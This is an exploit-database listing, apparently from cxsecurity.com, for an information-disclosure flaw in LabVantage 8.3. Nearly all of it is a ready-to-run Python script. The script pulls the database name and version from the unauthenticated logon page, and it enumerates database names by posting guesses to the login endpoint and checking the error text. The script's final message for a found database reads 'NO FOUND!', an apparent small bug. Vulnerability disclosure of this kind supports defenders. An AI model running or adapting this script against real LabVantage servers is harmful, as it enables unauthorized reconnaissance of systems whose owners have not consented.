LabVantage 8.3 Information Disclosure

2020.02.17
Credit: Joel Aviad Ossi
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: LabVantage 8.3 - Information Disclosure # Google Dork: N/A # Date: 2020-02-16 # Exploit Author: Joel Aviad Ossi # Vendor Homepage: labvantage.com # Software Link: N/A # Version: LabVantage 8.3 # Tested on: * # CVE : N/A import requests import operator def exploit(target): print("[+] Fetching LabVantage Database Name..") start = "name=\"database\" id=\"database\" value=\"" end = "\" >" vstart = "<img src=\"WEB-OPAL/layouts/images/logo_white.png\" title=\"" vend = "viewportTest" print("[+] Testing URL: " + target) r = requests.get(target) memory = r.text print("[+] DB: " + memory[memory.find(start) + len(start):memory.rfind(end)]) print("[+] VERSION: " + memory[memory.find(vstart) + len(vstart):memory.rfind(vend)][:-71]) print("[+] Vulnerable!") def vuln_check(): target = input("\nTARGET HOST URL (example: target.com:8080): ") print('[+] Checking if Host is vulnerable.') target = (str(target) + "/labservices/logon.jsp") r = requests.get(target) memory = r.text s = "name=\"database\" id=\"database\" value=\"" if not operator.contains(memory, s): print("[-] Not Vulnerable!") exit(0) else: exploit(target) def attack(): target = input("\nTARGET HOST URL (example: http://target.com:8080): ") enum = input("\nDB NAME TO CHECK: ") headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0', 'Content-Type': 'application/x-www-form-urlencoded'} payload = ({'nexturl': 'null', 'ignorelogonurl': 'N', 'ignoreexpirywarning': 'false', '_viewport': 'null', 'username': 'null', 'password': 'null', 'database': ''+str(enum)+'', 'csrftoken': 'null'}) target = (str(target) + "/labservices/rc?command=login") print("[+] Testing URL: " + target) r = requests.post(target, headers=headers, data=payload) memory = r.text start = "Unrecognized" if start in memory: print('[+] DB NOT FOUND!') else: print('[!] NO FOUND!') print("\n1. Vulnerability Check\n2. DB Name Enumeration\n") option = input("CHOSE OPTION: ") if option == "1": vuln_check() elif option == "2": attack() else: print("Wrong option selected, try again!")


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top